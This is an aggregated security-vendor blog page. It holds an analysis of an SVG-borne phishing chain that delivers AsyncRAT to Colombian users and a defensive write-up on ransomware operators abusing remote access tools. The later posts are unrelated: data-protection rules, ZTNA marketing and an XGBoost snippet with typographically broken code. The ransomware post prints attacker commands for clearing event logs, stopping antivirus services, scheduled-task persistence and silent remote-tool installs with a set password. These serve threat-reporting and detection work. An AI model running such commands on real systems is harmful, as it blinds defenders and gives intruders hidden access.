دسته: هسته اصلی سیستم‌عامل

Judicial Notification Phish in Colombia — .SVG Delivers AsyncRAT

Content Overview

Introduction
Initial Vector
Infection Chain
Analysis of .SVG Attachment
Analysis of .HTA file
Analysis of .VBS file
Analysis of .ps1 file
Analysis of Downloader/Loader
- Anti-VM Technique
- Persistence Technique
- Download and Loader Function
AsyncRAT Payload
File MD5’s
Quick Heal \ Seqrite Detections
MITRE Attack Tactics, Techniques, and Procedures (TTPs)

Introduction –

There has been a significant increase in the use of SVG files in malware campaigns. These harmless looking files can hide harmful scripts that hackers use to launch sneaky phishing attacks.

Recently, we have observed one such attack in Spanish language targeting Colombian users with Judicial Notification lure. The campaign demonstrates the use of geographical and institutional details to make the phishing lure look more legitimate and trustworthy to the targeted victim. The campaign leverages SVG, HTA, VBS, and Powershell stages to download and decode a loader, which finally injects AsyncRAT into a legitimate Windows process, evading detection.

Initial Vector –

Campaign follows a cleverly crafted phish email that impersonates a judicial notification from “Juzgado 17 Civil Municipal del Circuito de Bogotá”. It references to “17th Municipal Civil Court of the Bogotá Circuit”. Bogotá is the capital and largest city of Colombia and many government institutions like courts, ministries and other officials are based there.

Body of the email contains below message in Spanish-

Attached is a lawsuit filed against you.

17th Municipal Civil Court of the Bogotá Circuit

September 11, 2025

Sincerely,

Judicial Notification System

The email is written and mimicked the style of an official judicial notice by using formal legal language and institutional naming.

The spam contains an .SVG (Scaler Vector Graphics) file as an attachment. Name of the file is “Fiscalia General De La Nacion Juzgado Civil 17.svg” that translate to “Attorney General’s Office Civil Court 17.svg” in English.

This carefully crafted email is an important entry point of infection chain that leverages social engineering and official-looking contents to entice recipients into opening the attachment.

Infection Chain –

As we can see in above diagram, the infection chain begins with judicial phishing lure (Spanish-language) with Subject “Demanda judicial en su contra – Juzgado 17 Civil Municipal” — carrying a seemingly harmless .SVG file.

Opening the .SVG file takes the user to a fake Web page masquerading as the Attorney General’s Office. It asks the user to download an important document from the official website. Once clicked on the page, an attacker-controlled-download is triggered that downloads embedded .HTA file. It further executes and drops a Visual Basic dropper (actualiza.vbs).

The VBS calls a Powershell downloader (veooZ.ps1) which retrieves an encoded blob as a text file (Ysemg.txt). After decoding, the blob is written as classlibrary3.dll.

classlibrary3.dll acts as a module loader. It fetches an injector component and the AsyncRAT payload, then performs an in-memory injection of AsyncRAT into MSBuild.exe. By running the RAT inside a trusted process, the attacker gains persistence and stealth.

Analysis of .SVG Attachment –

SVGs (Scalable Vector Graphics) are a type of image file that uses XML code (a text-based format) to describe shapes, lines, colors, and text. Unlike normal images (like JPGs or PNGs), SVGs don’t store pixels. Instead, they store instructions which can become a very easy place for attackers to store their malicious intentions. Moreover, these file types enable attacker to stay FUD (Fully Undetected), as many of the traditional security solutions do not check these files for malicious code.

During the time of analysis of this campaign, the SVG file in attachment was detected by QuickHeal/Seqrite.

Fig-3: Very Less Detection on Attached .SVG File

Upon executing malicious .SVG file, a Web page gets opened in Web Browser.

Fig-4: Lure Web Page for Attorney General’s Office

This mimics a Web page or a website related to Attorney General’s Office and Citizen’s Consultation Portal. It contains some more fake fields like Judicial Information System, fake consultation registration number etc. to make it look more genuine. It also lures victims to DOWNLOAD DOCUMENT.

When analyzed the code in SVG file we can see below defined elements –

Fig-5: Important Elements in SVG File

style=“cursor:pointer;” – Shows clickable cursor on the image.
onclick=“openDocument()” – This is an important defined element. When user clicks the SVG, the browser will call the openDocument(), which is JavaScript function. Function definition looks like below –

Function openDocument() –

accept base64 encoded embedded data,
decode it to attacker controlled “HTML” blob,
create a temporary URL object for that blob,
open that URL in new tab.

This opens next stage HTML page –

Fig-7: Lure Judicial Page, with Fake Progress Bar UI

The above HTML page poses as an official “Rama Judicial” document viewer. It uses a fake progress bar UI to convince victims that a legitimate download is going on.

On load it decodes a Base64 blob and forces the browser to download DOCUMENTO_OFICIAL_JUZGADO.HTA file. HTA files execute an arbitrary Windows script.

This client-side dropper (Base64 → Blob → createObjectURL → forced .HTA dropper) is a clear staged dropper intended to deliver and run further payloads.

Analysis of .HTA file –

HTA file contains a lot of junk code and there is a chunk of malicious script kept tucked between this junk code with huge blob of base64 encoded part. This base64 encoded part is decoded and saved as actualiza.vbs as shown in fig

Fig-9: HTA file with base64 encoded code which will drop actualiza.vbs

Analysis of .VBS file –

The base64 decoded file again contains lots of repetitive junk lines which on cleanup, looks like below:

The code writes a Powershell script which is inside variable named GftsOTSaty. The actual Powershell code is kept incomprehensible by placing character “9&” instead of “A” with further base64 encoding. The decoded code is written to file veooZ.ps1 which will be executed further.

Analysis of .ps1 file –

The Powershell script will connect to dpaste domain URL and download a plaintext file, named as “Ysemg.txt”.

Ysemg.txt is a raw text file. Contents of this file is cleaned and is base64 decoded. As you can see in Fig-11, “$$” is replaced by letter “A” and is base64 decoded which gives us a

.NET assembly file with its name as classlibrary3.dll. One of its method called “MSqBIbY” is invoked in the script and some values are passed to this method as arguments. In our case, the first argument passed is base64 encoded string, as we can see in Fig-11:

The second argument in script is %JkQasDfgrTg% but when you check the other commands (refer below snippets), you can see it is passing the .vbs file with its path as second argument.

Fig-13: Code snippets from script

In Fig-11, from this file path which is being passed in second argument, “\”as replaced by “$“, this will be again replaced in .net file.

Analysis of Downloader-Loader –

The decoded file is a .NET dll which will get one URL through the arguments passed in the script and it has one embedded in it. On checking the static code, it primarily looks like a downloader file with some other checks that will make sure everything goes well and in certain scenarios, can also try to add persistence factor for the malware.

The file is heavily obfuscated and uses XOR’ing and shifting operations loop to decode these obfuscated values.

As said previously, the second argument will be the file path of vbs script in which “\” is replaced with “$”, the dll file again replaces the value and makes the file-path proper.

Anti-VM Technique:

There is an anti-analysis trick found in the code, where it is checking for VirtualBox and VMware related processes. First it checks if yktfr variable is 4 if yes, it checks for running processes and if VM related processes found, it exists. In our case it is 0, so this will be ignored.

Persistence Technique:

It also checks for “1” in the fourth argument, if yes it creates a Powershell script through concatenation which is run through shell (Fig-15). But in our case, as previously said it is 0.

The Powershell script adds the vbs file in run registry to maintain persistence.

Fig-16: PS script creation to maintain persistence

Similarly, it drops .lnk shortcut file in the startup folder if the value is 3. Again, a persistence technique much used by attackers.

Download and Loader Function:

The value in text5 decodes to a reversed dpaste url again which is formatted first and then through “webClient.DownloadString(text5)”, a txt kind of file with base64 code and stars is downloaded and saved in text4. On reversal, we can see TVqQ which is base64 encoded MZ marker. In next step, the dll replaces stars with A. So, now we have a new PE file.

Fig-18: Downloaded content upon reversal

The file is also a .NET dll. In similar fashion, one more file is downloaded but, in this case, the URL is our first argument. The file is just reversed and base64encoded and it is a .NET executable stored in variable text7. The text7 file is actually AsyncRAT file which will be discussed later.

Fig-19: File code taking passed encoded URL and downloading another file

As in below figure (Fig-18), the new downloaded dll (stored in text4) is loaded through AppDomain.CurrentDomain() function and a method is invoked to which two arguments are passed as we can see. On checking the function that is being called (Fig-19), it takes two arguments, one in which injection that will take place and the other containing the code that is to be injected.

Fig-20: Process Injection function being called

So, the new dll acts as injector which is injecting AsyncRAT payload in MSBuild.exe.

Below is a snippet from the injector dll, The \uFDD0 function have all the injection related functions:

Fig-21: Process Injection Function from Injector Dll

AsyncRAT Payload-

AsyncRAT is a remote access Trojan (RAT) written in C#. It provides typical RAT and data-stealing functions—such as keystroke logging, executing or injecting additional payloads, and command-and-control—whose exact capabilities depend on its embedded configuration. It is a .NET compiled binary, and, in our case, the code was not obfuscated and can be analyzed easily. AsyncRAT ’s primary usage is to steal your data and send it to C&C. Some of the notable observations from this payload we analyzed are below –

For creating persistence, it checks whether current process is running with elevated privileges.
- If yes, creates a scheduled task with command – schtasks /create /f /sc onlogon /rl highest /tn “<filename>” /tr “<fullpath>”
- If no, writes its path under registry-HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Has Anti-Analysis, Anti-VM, Amsi-bypass checks.
Checks for the presence of Mutex with name “DcRatMutex_qwqdanchun”.
Checks whether a webcam is available on the infected machine. If a camera is found, the malware can later use it for spying or surveillance purpose.
Iterate through running processes and kill process monitoring and analysis tools, like Taskmgr.exe, ProcessHacker.exe, etc.
Gathers system details such as HWID, OS, user privileges, camera presence, and antivirus information.
Establish connection to C2.
Dynamically load and run a plugin sent from the C2 server.
Securely pack the gathered data into MessagePack object and send over the TLS connection (Large messages are split into chunks before transmitting).

File MD5’s –

b1ed63ee45ec48b324bf126446fdc888

817081c745aa14fcb15d76f029e80e15

6da792b17c4bba72ca995061e040f984

f3b56b3cfe462e4f8a32c989cd0c5a7c

5fad0c5b6e5a758059c5a4e633424555

fe0fc2949addeefa6506b50215329ed9

Quick Heal \ Seqrite Detections –

Trojan.InjectorCiR

Html.Asyncrat.49974.GC

Script.Trojan.49969.GC

Backdoor.MsilFC.S13564499

Trojandownloader.AgentCiR

MITRE Attack Tactics, Techniques, and Procedures (TTPs)

Tactics (ATT&CK ID)	Techniques / Sub-technique (ID)	Procedure
Initial Access (TA0001)	T1566.001	Malicious .svg attachment opened
Execution (TA0002)	T1218.005 / T1059.001	SVG drops/executes .hta → PowerShell
Execution (TA0002)	T1059.005	HTA writes & runs actualiza.vbs
Persistence (TA0003)	T1547.001	Adds Run key under HKCU\…\Run
Persistence (TA0003)	T1053.005	Creates schtasks onlogon task
Defense Evasion (TA0005)	T1027	Base64 / reversed strings / junk obfuscation
Defense Evasion (TA0005)	T1562.001	Kills security / monitoring tools
Defense Evasion (TA0005)	T1055	Injects AsyncRAT into MSBuild.exe
Defense Evasion (TA0005)	T1497	VM/sandbox WMI & process checks (exit in VMs)
Defense Evasion / Impact (TA0005 / TA0006)	T1112 / T1070	Deletes/cleans specific registry keys
Discovery (TA0007)	T1057	Enumerates running processes
Discovery (TA0007)	T1082 / T1012	Collects system info; reads registry
Collection (TA0009)	T1125	Checks for webcam presence
Command and Control (TA0011)	T1071 / T1573	TLS-wrapped TCP using MsgPack
C2 & Modular Capabilities (TA0011)	T1105	Downloads injector and payload modules
C2 & Modular Capabilities (TA0011)	T1543 / T1609	Loads plugins from registry on demand
Exfiltration (TA0010)	T1041	Sends data over encrypted C2 (chunked)

Authors –
Prashil Moon, Kirti Kshatriya

Source link

اکتبر 13, 2025

Exploiting Legitimate Remote Access Tools in Ransomware Campaigns

Introduction

Ransomware is one of the most disruptive cyber threats, encrypting critical organizational data and demanding ransom payments for restoration. While early campaigns relied on mass phishing or opportunistic malware distribution, modern ransomware operations have evolved into highly sophisticated, targeted attacks. Today’s adversaries not only infect machines but also move laterally across networks, harvest credentials, neutralize defences, and maintain persistent control—all while remaining stealthy and evading detection.

Disclaimer: The Remote Access Tools discussed in this blog are legitimate software products designed to support IT administration and remote support. This article highlights how adversaries may misuse them in ransomware campaigns if they are misconfigured, poorly managed, or left unmonitored. It does not suggest that the tools themselves are inherently vulnerable or malicious.

A key enabler of these attacks is the exploitation of legitimate Remote Access Tools (RATs) such as AnyDesk, UltraViewer, AppAnywhere, RustDesk, CloneDesk, Splashtop, and TightVNC. Originally designed for IT administration and remote support, many of these tools offer free or freely available versions, which attackers often abuse because they are easy to deploy, widely trusted, and frequently whitelisted in enterprise environments. These tools provide:

Unattended access: Connect without user interaction
File transfer: Move binaries or exfiltrate data
Interactive desktop control: Execute administrative tasks remotely
Encrypted communications: Evade network monitoring

Organizations often whitelist Remote Access Tools and trust their digital signatures, which attackers exploit to bypass security controls and persist stealthily. Understanding how Remote Access Tools are abused is critical for building effective defences against modern ransomware threats.

The Ransomware Kill Chain: A Step-by-Step Breakdown

The ransomware kill-chain outlines each stage of an attack, from initial access to final impact. When attackers leverage legitimate Remote Access Tools, they gain stealth, persistence, and control, making detection and mitigation more challenging.

Stage 1: Initial Access – Credential Compromise

Attackers gain legitimate access using stolen or brute-forced credentials, bypassing defences while appearing as trusted users. Targeting administrator accounts provides maximum control and enables later stages like Remote Access Tool deployment and lateral movement.

Common Attack Pathways:

Brute-force attacks against RDP/SMB endpoints
Credential reuse from leaks or past breaches
Targeting administrator accounts for maximum privileges
Detection Indicators:
Windows Event IDs 4625 → 4624 (multiple failed logins immediately followed by success)
RDP logon type 10 at unusual hours
Logins from unexpected geolocations.

Stage 2: Remote Tool Abuse – Hijacking vs. Silent Installation

After gaining access, attackers focus on Remote Access Tool deployment for stealthy persistence. They can either hijack an existing Remote Access Tool to avoid detection or perform a silent installation using signed installers with minimal footprint. Silent installation often leverages known command-line flags, vendor documentation, or reverse-engineering to find deployment parameters.

Method 1: Hijacking Existing Remote Access Tools

Enumerate installed Remote Access Tools via WMI, registry, or PowerShell.
Add attacker credentials or modify access configurations.
Avoids creating new files or processes, reducing detection risk.

Method 2: Silent Installation of Remote Access Tools

Deploy lightweight, signed installers without user interaction.
Silent Install Flags: /S, /VERYSILENT, /quiet, /NORESTART.

Remote Tools	Commands	Purpose / Effect
AnyDesk	anydesk.exe –install “C:\ProgramData\AnyDesk” –silent –start-with-win	Persistent remote access service
UltraViewer	UltraViewer_Setup.exe /VERYSILENT /NORESTART	Install quietly with no reboot
AppAnywhere	msiexec /i AppAnywhere.msi /quiet /norestart	Enterprise-style silent deployment
RustDesk	rustdesk.exe –service install –password “Str0ngPass123”	Enables unattended remote access
CloneDesk	CloneDesk_Setup.exe /S /D=C:\ProgramData\CloneDesk	Minimal footprint installation
Splashtop	Splashtop_Streamer.exe /s /i silent=1 precheck=0 confirm=0	Quiet, enterprise deployment
TightVNC	tightvnc-setup.exe /S /NORESTART	CLI-driven hidden installation

Stage 3: Persistence & Privilege Consolidation

Attackers leverage registry run keys (HKCU\Software\Microsoft\Windows\CurrentVersion\Run), hidden scheduled tasks, and configuration file modifications to maintain persistence. Privilege escalation is achieved using tools like PowerRun or TrustedInstaller, allowing Remote Access Tools to run with SYSTEM privileges and bypass user-level restrictions.

Mechanisms:

Registry Run Keys: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Scheduled Tasks: Hidden tasks to auto-restart Remote Access Tools
Configuration Files: Modify config.toml (RustDesk) for unattended access
Privilege Escalation: Launch Remote Access Tool as SYSTEM using PowerRun or TrustedInstaller
Monitoring: New registry keys, scheduled tasks, elevated Remote Access Tool processes

Stage 4: Antivirus Neutralization & Anti-Forensics

Using Remote Access Tools, attackers can interactively stop Antivirus services, manipulate group policies, and add Remote Access Tool directories to exclusion lists. Critical logs are cleared, and file shredding tools are used to remove forensic evidence, making post-incident investigation difficult.

Techniques:

Stop Antivirus services: sc stop <service> or net stop <service>
Policy manipulation: Add Remote Access Tool directories to exclusions.
Log clearing: Adversaries often use the following command lines as part of Anti-Forensics to clear event logs:
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
File shredding: Remove forensic artifacts

Stage 5: Payload Deployment & Execution

Attackers stop Antivirus services, modify security policies, disable recovery mechanisms, clear event logs, and shred sensitive files to evade detection and hinder forensic investigations. They may also tamper with backup solutions, disable shadow copies, and use Living-off-the-Land Binaries (LOLBins) like rundll32 or PowerShell to blend malicious actions with legitimate processes. These actions ensure minimal visibility for defenders and create a safe environment for ransomware execution.

Mechanism:

Ransomware is delivered through Remote Access Tool channels, often disguised as trusted updates or administrative actions, and executed within existing remote sessions to bypass user suspicion and security monitoring.

Stage 6: Lateral Expansion

Lateral movement is facilitated through credential reuse, Remote Access Tool propagation, or exploiting enterprise Remote Access Tool deployments.

Mechanisms:

Credential reuse across endpoints
Enterprise Remote Access Tool exploitation for mass deployment

Indicators:

Multiple endpoints reporting new Remote Access Tool connections
Unauthorized scheduled tasks or registry modifications across machines

Stage 7: Impact – Encryption & Lockout

Ransomware payload execution triggers data encryption, account lockouts, and Remote Access Tool credential changes to block administrative remediation. Campaigns such as LockBit, Black and Basta variants demonstrate this final stage in live attacks.

Outcome:

Encrypt files on target systems
Lock accounts or change Remote Access Tool credentials to prevent remediation

Real-World Campaign Examples

Below are commonly abused Remote Access Tools leveraged by adversaries in ransomware campaigns for persistence, deployment, and lateral movement.

Remote Access Tool	Associated Ransomware Campaigns
AnyDesk	TargetCompany, D3adCrypt, Makop, Mallox, Phobos, LockBit 2.0, LockBit 3.0, LockBit 2025 Renegade, Beast, Dharma, Proton / Shinra, MedusaLocker
UltraViewer	Beast, CERBER, Dharma (.cezar Family), GlobeImposter 2.0, LockBit 3.0, Makop, Phobos, SpiderPrey, TargetCompany
AppAnywhere	Makop, Ryuk, D3adCrypt, Dharma
RustDesk	Mimic, LockXXX, Dyamond, D3adCrypt, Makop
Splashtop	Makop, BlueSky, RansomHub, Proxima
TightVNC	Cerber 4.0 / 5.0

Threat Actor TTP Mapping (MITRE ATT&CK)

Understanding the tactics, techniques, and procedures (TTPs) used by adversaries is crucial to defending against Remote Access Tool-driven ransomware campaigns. By mapping these activities to the MITRE ATT&CK framework, security teams can visualize how attackers gain access, deploy tools, maintain persistence, escalate privileges, and eventually deliver impactful payloads. The table below highlights the key stages of attack, the techniques leveraged, and the commonly abused remote access tools aligned to each step.

Stages	Technique	MITRE ATT&CK Sub-Technique ID	Observations
Initial Access	Brute Force	T1110.001	Targeting RDP/SMB endpoints to gain initial access
Tool Deployment	Ingress Tool Transfer	T1105	Remote access utilities transferred for execution
Execution	Remote Services	T1021.001	Remote sessions used to execute payloads
Persistence	Registry Run Keys	T1547.001	Registry keys created/modified for tool persistence
Privilege Escalation	Abuse Elevation Control Mechanism	T1548.002	Elevation of privileges observed to run tools with SYSTEM rights
Defense Evasion	Impair Defenses	T1562.001	Security services disabled, logs cleared
Lateral Movement	Remote Services	T1021.001	Remote services abused to move across endpoints
Impact	Data Encrypted for Impact	T1486	Tools leveraged to deploy ransomware and encrypt data

Emerging Trends & Future Threats

As ransomware operators evolve, new tactics are emerging that expand beyond traditional on-premise exploitation. These trends highlight how attackers are combining automation, cloud abuse, and RaaS ecosystems to maximize the scale and stealth of their operations.

AI-driven Remote Access Tool deployment: Automated decision-making for payloads
Cloud Remote Access Tool abuse: Exploiting cloud-based remote access portals
RaaS integration: Remote Access Tools embedded in ransomware-as-a-service offerings for enterprise campaigns
Multi-stage attacks: Initial Remote Access Tool compromise followed by secondary payloads (data exfiltration, cryptojacking, lateral ransomware)

How Quick Heal / Seqrite Protect Against These Activities.

Ransomware actors may try to weaponize trusted tools, but Quick Heal and Seqrite are built with multiple layers of defence to stop them in their tracks. By combining real-time monitoring, self-protection, and advanced behavioural detection, these solutions ensure that attackers can’t easily disable security or slip past unnoticed.

Virus Protection: Actively detects and neutralizes trojanized installers or hidden payloads before they can execute.
Antivirus Self Protection: Prevents attackers from forcefully terminating or uninstalling security services.
Behaviour-Based Detection: Monitors for abnormal activities linked to ransomware, such as mass file changes or suspicious process launches.
Ransomware Protection: Blocks unauthorized encryption attempts in real time, cutting off the attack before data is locked.
Application Control: Restricts the use of unauthorized remote tools, ensuring only trusted applications are allowed to run.

Security Best Practices & Recommendations

Defending against ransomware isn’t just about having the right tools — it’s also about using them wisely and building strong day-to-day habits. Here are some practical steps every organization can take to stay ahead of attackers:

Restrict Remote Access Tool Usage: Only keep the remote tools you really need and remove the rest. The fewer entry points, the safer your systems are.
Enforce Multi-Factor Authentication (MFA): Even if attackers steal a password, MFA makes it much harder for them to log in.
Limit Administrative Rights: Don’t hand out admin privileges unless absolutely necessary. Less privilege means less damage if an account is compromised.
Audit & Monitor Logs Continuously: Keep a close watch on your logs — unusual logins, silent installs, or strange setup commands can be early warning signs.
Regular Updates & Patching: Stay on top of updates for both your operating systems and security tools so attackers can’t exploit old flaws.
User Awareness Training: People are the first line of defence. Training staff to spot phishing emails or suspicious remote support activity can stop attacks before they even start.

Conclusion:

Legitimate IT tools can easily become hidden attack vectors when mismanaged, and Remote Access Tool abuse is now a critical enabler of next-generation ransomware. To counter this risk, enterprises need a layered approach that combines governance, monitoring, and rapid response.

Quick Heal and Seqrite play a central role in this defence strategy, providing strong Antivirus protection, behavioural detection, and Anti-Ransomware protection. When paired with strict governance and incident response, organizations can stay ahead of attackers.

Key measures include:

Remote Access Tool governance and whitelisting
Multi-layered Antivirus protections powered by Quick Heal / Seqrite
Behavioural detection and outbound filtering
Rapid incident response for containment and recovery

By adopting this multi-layered defence strategy, organizations can proactively detect, contain, and mitigate Remote Access Tool–based ransomware campaigns—turning trusted tools from potential threats into controlled, manageable assets.

Author: Matin Tadvi

Co-Author: Umar Khan

Source link

اکتبر 3, 2025

Countdown to DPDP Rules: What to Expect from the Final DPDP Rules
The wait is almost over. The final Digital Personal Data Protection (DPDP) Rules are just days away, marking the next big step after the enactment of the DPDPA in 2023. With only a few days left, organizations must gear up to align with new obligations on data protection, governance, and accountability.

Are you prepared to meet the requirements and avoid costly penalties? These rules will act as the operational backbone of the law, providing clarity on implementation, enforcement, and compliance.

With businesses, regulators, and citizens alike watching closely, the release of these rules will reshape India’s digital economy and data protection landscape. Here’s what to expect as the countdown begins.

Why the DPDP Rules Matter

While the DPDPA, 2023 laid down the broad principles of personal data protection—such as consent, purpose limitation, and user rights—the rules will answer the “how” questions:
- How should organizations obtain and manage consent?
- How will data principals exercise their rights?
- What will compliance look like for startups vs. large enterprises?
- How will penalties be calculated and enforced?
In short, the rules will turn principles into practice.

Key Areas to Watch in the Final Rules
1. Consent & Notice Requirements
Expect detailed procedures for how organisations must obtain consent, including the form, language, and accessibility of consent notices. The government may also clarify rules around “deemed consent”, which has raised debate among privacy experts.
1. Data Principal Rights
The rules will operationalise rights like data access, correction, erasure, and grievance redressal. Clear timelines for fulfilling these requests will likely be specified, adding compliance pressure on businesses.
1. Obligations for Data Fiduciaries
Significant data fiduciaries (LDFs) will have enhanced responsibilities—such as mandatory Data Protection Officers (DPOs), regular audits, and risk assessments. The criteria for what qualifies as an LDF will be closely watched.
1. Cross-Border Data Transfer
The government may publish its “whitelist” of countries where Indian personal data can be transferred. This will be crucial for IT/ITES, cloud, and fintech industries that rely heavily on global operations.
1. Children’s Data Protection
Rules around parental consent, restrictions on profiling, and targeted advertising for children may tighten, impacting edtech, gaming, and social platforms.
1. Enforcement & Penalties
The rules are expected to detail the functioning of the Data Protection Board of India (DPBI), including hearings, fines, and appeals procedures. This will define how strictly the law is enforced.
1. Transition & Implementation Timelines
Perhaps most critical will be the phased rollout plan. Businesses anxiously await to know how much time they will get to comply, and whether specific provisions will be delayed for startups and SMEs.

What Businesses Should Do Now

Even before the DPDP rules are published, organizations should start preparing:
- Map personal data flows across systems and vendors.
- Review consent management practices and plan for user-friendly updates.
- Establish governance frameworks—DPO roles, audit readiness, and escalation processes.
- Evaluate cross-border dependencies to anticipate transfer restrictions.
- Train employees in privacy responsibilities and incident handling.
Early movers will reduce compliance risks and gain customer trust in an era when data is a competitive differentiator.

The Bigger Picture

The DPDP Rules will set the tone for India’s privacy-first digital future. For businesses, this is more than just a compliance exercise—it’s a chance to demonstrate accountability, build trust, and strengthen their brand in a data-conscious marketplace.

As the countdown begins, one thing is clear: organisations that prepare proactively will be better positioned to adapt, comply, and thrive in the new regulatory environment.

Stay ahead of DPDP compliance with Seqrite. Prepare your organization now with Seqrite’s end-to-end data privacy and compliance solutions.

Talk to a Seqrite Compliance Expert
Source link
سپتامبر 25, 2025
Why Regional & Cooperative Banks Must Move from Legacy VPNs to ZTNA — Seqrite
Virtual Private Networks (VPNs) have been the go-to solution for securing remote access to banking systems for decades. They created encrypted tunnels for employees, vendors, and auditors to connect with core banking applications. But as cyber threats become more sophisticated, regulatory bodies tighten their grip, and branch operations spread into rural areas, it becomes increasingly clear that VPNs are no longer sufficient for regional and cooperative banks in India.

The Cybersecurity Reality for Banks

The numbers speak for themselves:
- In just 10 months of 2023, Indian banks faced 13 lakh cyberattacks, averaging 4,400 daily.
- Over the last five years, banks reported 248 successful data breaches.
- In the first half of 2025 alone, the RBI imposed ₹15.63 crore in penalties on cooperative banks for compliance failures, many linked to weak cybersecurity practices.
The most concerning factor is that most of these incidents were linked to unauthorized access. With their flat network access model, traditional VPNs make banks highly vulnerable when even one compromised credential slips into the wrong hands.

Why VPNs Are No Longer Enough
1. Over-Privileged Access
VPNs were built to provide broad network connectivity. Once logged in, users often gain excessive access to applications and systems beyond their role. This “all-or-nothing” model increases the risk of insider threats and lateral movement by attackers.

VPNs were built to provide broad network connectivity. Once logged in, users often gain excessive access to applications and systems beyond their roles.
1. Lack of Granularity
Banks require strict control over who accesses what. VPNs cannot enforce role-based or context-aware access controls. For example, an external auditor should only be able to view specific reports, not navigate through the entire network.
1. Operational Complexity
VPN infrastructure is cumbersome to deploy and maintain across hundreds of branches. The overhead of managing configurations, licenses, and updates adds strain to already stretched IT teams in regional banks.
1. Poor Fit for Hybrid and Remote Work
Banking operations are no longer confined to branch premises. Remote staff, vendors, and regulators need secure but seamless access. VPNs slow down connectivity, especially in rural low-bandwidth areas, hampering productivity.
1. Audit and Compliance Gaps
VPNs don’t inherently provide built-in audit logs, geo-restriction policies, or continuous verification—making compliance audits more painful and penalties more likely.

The Rise of Zero Trust Network Access (ZTNA)

Zero Trust Network Access (ZTNA) addresses the shortcomings of VPNs by adopting a “never trust, always verify” mindset. Every user, device, and context is continuously authenticated before and during access. Instead of broad tunnels, ZTNA grants access only to the specific application or service a user is authorized for—nothing more.

For regional and cooperative banks, this shift is a game-changer:
- Least-Privilege Access ensures employees, vendors, and auditors only see what they can.
- Built-in Audit Trails support RBI inspections without manual effort.
- Agentless Options allow quick deployment across diverse user groups.
- Resilience in Low-Bandwidth Environments ensures rural branches stay secure without connectivity struggles.
Seqrite ZTNA: Tailored for Banks

Unlike generic ZTNA solutions, Seqrite ZTNA has been designed with India’s banking landscape in mind. It supports various applications, including core banking systems, RDP, SSH, ERP, and CRM, while seamlessly integrating with existing IT infrastructure.

Key differentiators include:
- Support for Thick Clients, such as core banking and ERP systems, is critical for cooperative banks.
- Out-of-the-Box SaaS Support for modern banking applications.
- Centralized Policy Control to simplify access across branches, vendors, and staff.
In fact, a cooperative bank in Western Maharashtra replaced its legacy VPN with Seqrite ZTNA and immediately reduced its security risks. By implementing granular, identity-based access policies, the bank achieved secure branch connectivity, simplified audits, and stronger resilience against unauthorized access.

The Way Forward

The RBI has already stated that cybersecurity resilience will depend on zero-trust approaches. Cooperative and regional banks that continue to rely on legacy VPNs are exposing themselves to cyber risks, regulatory penalties, and operational inefficiencies.

By moving from VPNs to ZTNA, banks can protect their sensitive data, secure their branches and remote workforce, and stay one step ahead of attackers—all while ensuring compliance.

Legacy VPNs are relics of the past. The future of secure banking access is Zero Trust.

Secure your bank’s core systems with Seqrite ZTNA, which is built for India’s cooperative and regional banks to replace risky VPNs with identity-based, least-privilege access. Stay compliant, simplify audits, and secure every branch with Zero Trust.
Source link
سپتامبر 24, 2025
XGBoost for beginners – from CSV to Trustworthy Model – Useful code

import numpy as np

import pandas as pd

import xgboost as xgb

from sklearn.model_selection import train_test_split

from sklearn.metrics import (

    confusion_matrix, precision_score, recall_score,

    roc_auc_score, average_precision_score, precision_recall_curve

)

# 1) Load a tiny cusomer churn CSV called churn.csv

df = pd.read_csv(“churn.csv”)

# 2) Do quick, safe checks – missing values and class balance.

missing_share = df.isna().mean().sort_values(ascending=False)

class_share = df[“churn”].value_counts(normalize=True).rename(“share”)

print(“Missing share (top 5):\n”, missing_share.head(5), “\n”)

print(“Class share:\n”, class_share, “\n”)

# 3) Split data into train, validation, test – 60-20-20.

X = df.drop(columns=[“churn”]); y = df[“churn”]

X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.20, stratify=y, random_state=13)

X_tr, X_va, y_tr, y_va = train_test_split(X_tr, y_tr, test_size=0.25, stratify=y_tr, random_state=13)

neg, pos = int((y_tr==0).sum()), int((y_tr==1).sum())

spw = neg / max(pos, 1)

print(f“Shapes -> train {X_tr.shape}, val {X_va.shape}, test {X_te.shape}”)

print(f“Class balance in train -> neg {neg}, pos {pos}, scale_pos_weight {spw:.2f}\n”)

# Wrap as DMatrix (fast internal format)

feat_names = list(X.columns)

dtr = xgb.DMatrix(X_tr, label=y_tr, feature_names=feat_names)

dva = xgb.DMatrix(X_va, label=y_va, feature_names=feat_names)

dte = xgb.DMatrix(X_te, label=y_te, feature_names=feat_names)

# 4) Train XGBoost with early stopping using the Booster API.

params = dict(

    objective=“binary:logistic”,

    eval_metric=“aucpr”,

    tree_method=“hist”,

    max_depth=5,

    eta=0.03,

    subsample=0.8,

    colsample_bytree=0.8,

    reg_lambda=1.0,

    scale_pos_weight=spw

)

bst = xgb.train(params, dtr, num_boost_round=4000, evals=[(dva, “val”)],

                early_stopping_rounds=200, verbose_eval=False)

print(“Best trees (baseline):”, bst.best_iteration)

# 6) Choose a practical decision treshold from validation – “a line in the sand”.

p_va = bst.predict(dva, iteration_range=(0, bst.best_iteration + 1))

pre, rec, thr = precision_recall_curve(y_va, p_va)

f1 = 2 * pre * rec / np.clip(pre + rec, 1e–9, None)

t_best = float(thr[np.argmax(f1[:–1])])

print(“Chosen threshold t_best (validation F1):”, round(t_best, 3), “\n”)

# 7) Explain results on the test set in plain terms – confusion matrix, precision, recall, ROC AUC, PR AUC

p_te = bst.predict(dte, iteration_range=(0, bst.best_iteration + 1))

pred = (p_te >= t_best).astype(int)

cm = confusion_matrix(y_te, pred)

print(“Confusion matrix:\n”, cm)

print(“Precision:”, round(precision_score(y_te, pred), 3))

print(“Recall   :”, round(recall_score(y_te, pred), 3))

print(“ROC AUC  :”, round(roc_auc_score(y_te, p_te), 3))

print(“PR  AUC  :”, round(average_precision_score(y_te, p_te), 3), “\n”)

# 8) See which column mattered most

# (a hint – if people start calling the call centre a lot, most probably there is a problem and they will quit using your service)

imp = pd.Series(bst.get_score(importance_type=“gain”)).sort_values(ascending=False)

print(“Top features by importance (gain):\n”, imp.head(10), “\n”)

# 9) Add two business rules with monotonic constraints

cons = [0]*len(feat_names)

if “debt_ratio” in feat_names: cons[feat_names.index(“debt_ratio”)] = 1     # non-decreasing

if “tenure_months” in feat_names: cons[feat_names.index(“tenure_months”)] = –1  # non-increasing

